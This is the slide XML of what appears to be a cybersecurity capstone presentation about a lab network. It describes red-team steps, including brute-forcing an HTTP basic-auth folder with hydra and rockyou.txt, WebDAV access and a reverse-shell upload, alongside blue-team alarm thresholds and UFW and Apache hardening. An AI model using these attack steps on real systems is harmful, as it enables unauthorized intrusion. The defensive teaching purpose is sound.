            <a:endParaRPr lang="en-US" sz="1200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threshold would you set to activate this alarm?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An appropriate threshold for sequential requests from a single IP address might be more than 8 requests over the span of 30 minutes.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C5D8F0B-8B7D-3746-8BEF-0C8958FCD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configuration can be set on the host to block unwanted access?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The host should be configured to block all traffic to the directory from outside the company’s network. This can be accomplished using UFW as follows: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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200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latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> default deny all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"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200" dirty="0" err="1">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"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latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Mono" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> allow from 192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:ea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4FCDB-D1D7-C94A-862E-370497F2E1E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Finding the Request for the Hidden Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157256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C7FC67-9511-AF4A-8E9C-16F728B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B1C9AC-2CE2-604D-B978-7AE0AED1C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kind of alarm can be set to detect future brute force attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>An alarm should be set to trigger if a predefined number of requests are issued to the server from a single IP address, especially if those requests result in HTTP 401 (Unauthorized) responses. Since the brute force attack requires a high number of requests to complete, this traffic could potentially be blocked before the password is guessed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Additionally, an alert should be set if any user on the system has several consecutive failed authentication attempts.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threshold would you set to activate this alarm?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An appropriate threshold might be 100 requests from a single IP address in the span of 2 minutes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>For consecutive failed authentication attempts, the alert should trigger if any user has more than 5 consecutive failed authentication attempts.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BD587-F86A-6A4A-8CBC-EF3D4ABE8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configuration can be set on the host to block future brute force attacks?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>The host can be configured with a firewall to prevent request spamming on the HTTP Basic Auth page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>A firewall could be configured to block consecutive requests, but this would not lock out a user’s account after consecutive failed authentication attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Setting up a lockout after consecutive failed attempts is not trivial to accomplish using the mechanisms provided by Apache, but a custom authentication system could be implemented and used.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A6D3F-D5EC-1E4D-838D-F62B591C55A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Preventing Brute Force Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35830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2110-FA55-FA41-BD86-E0A4D734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E5AE2EE-D344-554C-A67A-BF2D454E0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 contains the following sections:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Google Shape;1028;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A51E00CF-495E-D745-9ED1-CF28CCCF8458}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838201" y="2090191"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Google Shape;1029;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6898FAF-1E23-6949-8BA0-47B0830A256F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chemeClr val="bg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 dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg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" name="Google Shape;1030;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDC31C85-52FA-A64F-B164-93F8BA554408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" name="Google Shape;1031;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B8E905-FC05-914D-BD56-6BD87536F50D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838201" y="3192031"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Google Shape;1032;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAAE96A-A549-354A-BAEE-CDBF8B5D74FB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" name="Google Shape;1033;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7743E425-6244-5440-AB29-09050862B3D8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" name="Google Shape;1034;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FE68C4-B440-4D4C-BCB3-F74B1CD753DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838201" y="4293867"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Google Shape;1035;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{862F38BF-AD10-8C41-9552-15C5409419D6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" name="Google Shape;1036;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B18E17-875E-E74F-AB07-A63515C2BF6D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037;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BEB241A-F15F-8943-BAE1-151D1570C951}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838201" y="5395703"/>
            <a:ext cx="776889" cy="621300"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="776889" cy="621300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Google Shape;1038;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B21ABE8-FBA5-734D-A9F9-DECCBE33B8B2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" name="Google Shape;1039;p55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA960928-E9D0-234D-B21E-9819E9088E8A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" name="Google Shape;1027;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFF096B-B1F1-2247-9C63-A13AF13D7A2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873841" y="2090191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Network Topology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1027;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDF15767-4BCD-B146-97C2-4E8B751100C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873841" y="3192031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Red Team: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Security Assessment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Google Shape;1027;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D53DECC-1442-9D48-9FC1-F8B68B918744}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873841" y="4288319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Blue Team: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Log Analysis and Attack Characterization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027;p55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E28EC1-5EB6-4A45-9808-CF4298461E01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873841" y="5395703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Hardening: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Proposed Alarms and Mitigation Strategies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6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C7FC67-9511-AF4A-8E9C-16F728B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D90CCF-5950-604F-AF8D-4A8332C7BE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kind of alarm can be set to detect future unauthorized access?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An alarm should be set to trigger if any access to the WebDAV directory is made from outside the company’s internal network.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Additionally, an alarm should be set on any file upload (i.e., a PUT request) to the WebDAV directory. While this may result in some false positives, upload traffic to the WebDAV directory is so minimal it would not be a problem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US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threshold would you set to activate this alarm?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An appropriate threshold might be more than 100 GET requests to the WebDAV directory, and any PUT requests.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7CCDEF-790F-7048-8EE1-36F61D91EA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configuration can be set on the host to control access?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The host should be configured to deny WebDAV uploads by default, and only allow uploads from a specific IP address. This can be accomplished using Apache’s configuration files.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WebDAV by itself has no security. Therefore, authentication and authorization must be handled in the webserver layer (i.e., Apache). Apache can be configured with a variety of authentication systems, including HTTP Basic Auth, Digest Auth, and Kerberos.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D215-D3CE-1B4D-B801-025B1427248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Detecting the WebDAV Connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2276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C7FC67-9511-AF4A-8E9C-16F728B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A359E5-A0E6-8A45-AEA2-262AD732E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kind of alarm can be set to detect future file uploads?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An alarm should be set to trigger if any file is uploaded to the server from outside the company’s network, especially if that file has a suspicious name. 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threshold would you set to activate this alarm?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An appropriate threshold might be one file uploaded to the server from outside the internal network. If the file comes from the internal network and has a suspicious name, like “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>”, the alert should also trigger.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819A0-0A32-FF48-9618-6C229CB71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configuration can be set on the host to block file uploads?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All file uploads from outside the internal network should be blocked. Additionally, a higher level of permissions should be required to upload files. This can be accomplished through the authentication system in front of the WebDAV server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Users should be more careful about sharing their passwords, as the WebDAV credentials were gleaned from a file on the server.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BE78B-9205-AD42-8BF5-A6C1ADE8A30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Identifying Reverse Shell Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31204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DC43E-619F-3C43-8A0D-2C139BF1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23805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DC4E7-73D2-1647-8682-E506FB8E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A91270-3C8B-324D-8934-9C23C25B1024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690692"/>
            <a:ext cx="6297706" cy="4606183"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 30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B780DA-A0EF-FD46-A922-D9E41AC0D30E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7544634" y="1690692"/>
            <a:ext cx="3809166" cy="4606183"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 390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endParaRPr lang="en-US" sz="14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F305E7-BC5F-6C4B-9610-E85FDD24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28" y="1845808"/>
            <a:ext cx="5375100" cy="4295949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E44E45-B43D-9E4E-A567-52D54FB2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06655"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7691214" y="1845809"/>
          <a:ext cx="3520870" cy="429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37">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="539446103"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1461333">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="349774408"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="286397">
                <a:tc gridSpan="2"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Network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14117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Address Range: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192.168.1.0-255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599427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Netmask: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255.255.255.0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3002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Gateway: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18667"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="28639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40334"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="28639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Machines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438303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7893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10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54476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ML-RefVM-684427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29117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endParaRPr lang="en-US" sz="11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21374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192.168.1.90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73414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Kali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47009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Kali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53578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endParaRPr lang="en-US" sz="11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756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192.168.1.100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94583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Ubuntu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84935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ELK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948416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endParaRPr lang="en-US" sz="11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43228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192.168.1.105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26549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Ubuntu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32620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server1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4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04794-74F4-FE40-95FB-67C37CFBE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 Assessment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4FE0B-7738-4E46-B567-892EBD40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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="220543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Recon: Describing the Target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Nmap identified the following hosts on the network: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ADC1046-D93F-3645-A30B-5A7C7911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616698"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="2039582"/>
          <a:ext cx="10515597" cy="439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Hostname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IP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Role on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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>ML-RefVM-684427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192.168.1.1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Hypervisor / Gateway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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Kali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192.168.1.90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Attacker Machine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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>ELK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192.168.1.100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ELK Stack Server (Elasticsearch, Logstash, Kibana)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r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>server1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192.168.1.105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 Machine (Capstone)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1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DA86E2E-CB57-A64F-A487-DBFF255A4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829664"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="1982623"/>
          <a:ext cx="10515597" cy="341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Vulnerability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r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Brute Force Vulnerability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Brute-force attacks use trial-and-error to guess login information.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brute-force vulnerability allows attackers to access sensitive or confidential information.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r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Remote Code Execution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attacker executes arbitrary code on the target machine over the network.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attacker can access confidential files, destroy or steal company data, or take down an entire network.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r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Unauthorized File Upload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Unauthorized and un-vetted files can be uploaded to an http server.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file containing a reverse-shell payload can be uploaded, allowing for arbitrary code execution.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182880" marR="182880" marT="182880" marB="18288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assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291161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F27B-83D5-B14C-8BDA-F5A3A51C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Exploitation: Brute Force Vulnerability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3F04EC-DFA7-3943-AB07-DDD56ACAB1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="445406" y="1690617"/>
            <a:ext cx="3650372" cy="4802178"/>
            <a:chOff x="571107" y="1690642"/>
            <a:chExt cx="3650372" cy="4802178"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Google Shape;1091;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60B027AE-1F8D-6448-A58A-3EC9D86B0E32}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="838199" y="2283313"/>
              <a:ext cx="3383280" cy="4209507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Tools &amp; Processes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directory </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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/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company_folders</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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/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secret_folder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 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on the Apache webserver is protected by HTTP basic authentication.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By using the tool </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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hydra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along with the wordlist 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rockyou.txt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, we can brute-force the password.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basic auth realm provided the message “For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ashtons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eyes only”, so the username “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ashton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” was used in the brute-force attack.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following </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0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hydra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command was used:</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Google Shape;1093;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF577030-B7D7-944B-9676-A7F5CF31C463}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="571107" y="1690642"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Google Shape;1094;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A418A0-1470-0B4F-8FE6-55451D433B13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01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" name="Google Shape;1095;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C0954A-CC09-F445-BEBC-67BD777CAB8D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5727BF-0F22-9C47-A450-49C1DA1F6599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4270813" y="1690617"/>
            <a:ext cx="3650374" cy="4802128"/>
            <a:chOff x="4391833" y="1690692"/>
            <a:chExt cx="3650374" cy="4802128"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Google Shape;1096;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28C26CF-34FF-A143-991E-80A95FF9FE4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4391833" y="1690692"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Google Shape;1097;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0277B38-8BFE-8547-82DA-380599332EA8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02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2" name="Google Shape;1098;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402E8B74-5D43-EE47-BBE1-0453AED38163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099;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E13990F-1B45-BE4D-BCE1-808DC2F2175E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4658927" y="2283364"/>
              <a:ext cx="3383280" cy="420945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400" b="1" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:cs typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Achievements</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="91440" lvl="0" indent="-91440">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc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exploit provided us with the username and password for the “secret” company folder, which contained instructions for connecting to the company’s WebDAV server.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A341F1-D86F-E24D-8172-360398C62BA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8096223" y="1690667"/>
            <a:ext cx="3650374" cy="4802078"/>
            <a:chOff x="8200117" y="1690642"/>
            <a:chExt cx="3650374" cy="4802078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Google Shape;1101;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B1EF8C-3124-EC45-A43D-00D8D146D797}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8200117" y="1690642"/>
              <a:ext cx="533372" cy="533480"/>
              <a:chOff x="457200" y="1378813"/>
              <a:chExt cx="695400" cy="695450"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="Google Shape;1102;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED36CB4F-A0F6-8648-A807-3FBE80D0664C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03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7" name="Google Shape;1103;p61">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49EE94B3-BBC0-C847-9B79-E7713B2D60F0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" name="Google Shape;1104;p61">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3224935-BBE9-B644-AF89-1683E4F21612}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8467211" y="2283313"/>
              <a:ext cx="3383280" cy="4209407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400" b="1" dirty="0">
                  <a:latin typeface="Roboto"/>
                  <a:ea typeface="Roboto"/>
                  <a:sym typeface="Roboto"/>
                </a:rPr>
                <a:t>Results</a:t>
              </a:r>
            </a:p>
            <a:p>
